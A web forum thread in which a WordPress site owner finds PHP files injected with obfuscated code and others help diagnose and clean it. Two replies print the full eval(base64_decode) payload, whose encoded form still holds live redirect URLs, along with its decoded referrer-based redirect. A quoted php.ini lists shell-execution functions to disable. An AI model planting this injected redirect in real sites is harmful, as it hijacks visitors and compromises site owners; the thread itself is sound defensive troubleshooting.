Somethings gone terribly wrong, what do I do?

[Ash149]

Heey,

So have no idea what has happened but I just logged into to my server via Coda to make some changes to a WordPress theme and basically it looks like all the PHP files have changed, they all are like this:

">

That’s just a small amount from the single.php page. I’m guessing it has something to do with the encoding perhaps? I’ve have a look at the files through the WordPress admin and they are all the same, I did log into another FTP yesterday, could that have something to do with it, perhaps it changed the default encoding Coda used?

The website is workign fine at the moment, thankfully but I’m really worried about it. What will happen when I need to make changes, can I change it back somehow?

Any help is really, really appreciated…

Thanks!

Ash

[bungle]

Looks like you have been subject to an exploit

try

http://wordpress.org/extend/plugins/exploit-scanner/

[mwdewitt]

This is why it is always good practice to keep recent back-ups of your WordPress websites if at all possible.

[noahgelman]

Yup, What that “base64_decode” means is that the javascript was encoded into base64. It’s very easy to decode. Create the file here on your desktop and you can paste in the code and have it decoded for you.

Here is an example of the first line:

DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZnJvbGluZy5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9

which equals:

error_reporting(0);

$qazplm=headers_sent();

if (!$qazplm){

$referer=$_SERVER;

$uag=$_SERVER;

if ($uag) {

if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex.ru/yandsearch?(.*?)&lr=/",$referer) or preg_match ("/google.(.*?)/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {

if (!stristr($referer,"cache") or !stristr($referer,"inurl")){

header("Location: LINK REMOVED");

exit();

}

}

}

}

Basically it’s some code to redirect your traffic to their page I believe. Probably to farm ad revenue. The other lines are also basically the same thing.

I would change all your passwords and google around for other ways to more secure your website.

[mwdewitt]

In “Digging Into WordPress” by Chris Coyier, he goes over some tactics to make it a little more difficult for hackers to break into your website. Also, it’s a very good read for WordPress entrepreneurs.

[Ash149]

Ah! Thanks for the help everyone, have managed to backup most the folders so will keep on going, and will definitly check out the digging into WordPress book…

Gonna have to change every password now aren’t I?

Ash

[Ash149]

Ok, don’t know if this is something to worry about or not but this file is in my root folder and i’m not sure if it’s suppose to be or not, it’s called “php.ini” and it’s got the following in it:

register_globals = off

allow_url_fopen = off



expose_php = Off

max_input_time = 60

variables_order = "EGPCS"

extension_dir = ./

upload_tmp_dir = /tmp

precision = 12

SMTP = relay-hosting.secureserver.net

url_rewriter.tags = "a=href,area=href,frame=src,input=src,form=,fieldset="





; Only uncomment zend optimizer lines if your application requires Zend Optimizer support



;[Zend]

;zend_optimizer.optimization_level=15

;zend_extension_manager.optimizer=/usr/local/Zend/lib/Optimizer-3.3.3

;zend_extension_manager.optimizer_ts=/usr/local/Zend/lib/Optimizer_TS-3.3.3

;zend_extension=/usr/local/Zend/lib/Optimizer-3.3.3/ZendExtensionManager.so

;zend_extension_ts=/usr/local/Zend/lib/Optimizer_TS-3.3.3/ZendExtensionManager_TS.so





; -- Be very careful to not to disable a function which might be needed!

; -- Uncomment the following lines to increase the security of your PHP site.



;disable_functions = "highlight_file,ini_alter,ini_restore,openlog,passthru,

;		      phpinfo, exec, system, dl, fsockopen, set_time_limit,

;                     popen, proc_open, proc_nice,shell_exec,show_source,symlink"

Is that part of the hack or something to do with my host/wordpress?

Thanks again, this is a nightmare, eh!

[bungle]

yeah, that should be there

[kamran9868]

Same situation happened with client he owns 30 sites on one CPanel and all the php files got infected from this base64 code and when I decoded this I found that its just exploit to get traffic on few of the sites…
Only there is one way that download all files and clean them from this code and upload it again. Why these files infected is just a mystery . Still figuring out. Also read a good discussion board for this problem http://redleg-redleg.blogspot.com/2012/02/costabrava-bee-pl.html?showComment=1330986257272#c6640785865930412418

Searching for the security issue next to avoid such problem again. And if anybody found solution then please advise.

Regards

[kamran9868]

Actual base64 code is this

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbmFtZXN0aS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));

define( "WP_INSTALLING", true );

and after decoding I found this:

error_reporting(0);

$qazplm=headers_sent();

if (!$qazplm)

{

$referer=$_SERVER;

$uag=$_SERVER;

if ($uag)

{

if (stristr($referer,"yahoo") or

stristr($referer,"bing") or

stristr($referer,"rambler") or

stristr($referer,"gogo") or

stristr($referer,"live.com")or

stristr($referer,"aport") or

stristr($referer,"nigma") or

stristr($referer,"webalta") or

stristr($referer,"begun.ru") or

stristr($referer,"stumbleupon.com") or

stristr($referer,"bit.ly") or

stristr($referer,"tinyurl.com") or

preg_match("/yandex.ru/yandsearch?(.*?)

&lr=/",$referer) or

preg_match ("/google.(.*?)/url/",$referer) or

stristr($referer,"myspace.com") or

stristr($referer,"facebook.com") or

stristr($referer,"aol.com"))

{

if (!stristr($referer,"cache") or

!stristr($referer,"inurl"))

{

header("Location: http://froling(dot)bee(dot)pl/"); exit();

}

}

}

}

Note: I changed the URL of header location in code so nobody can click it accidentaly. Thanks Karlpcrowley for pointing me this issue.
Cleaning files one by one is really tedious work …

[kamran9868]

yeah sure … I just changed the URL … Well I’d been googling and I found this article very useful to find malicious code on a hacked server… its a script lookforbadguys which can help to find out infected files and code bugs.
I hope this may help.

[kamran9868]

Got one more good article for this here http://www.she-geeks.com/tag/malicious-eval-base64-code/ also check http://sucuri.net/ they seems good to fix the issue.

[Author]

Posts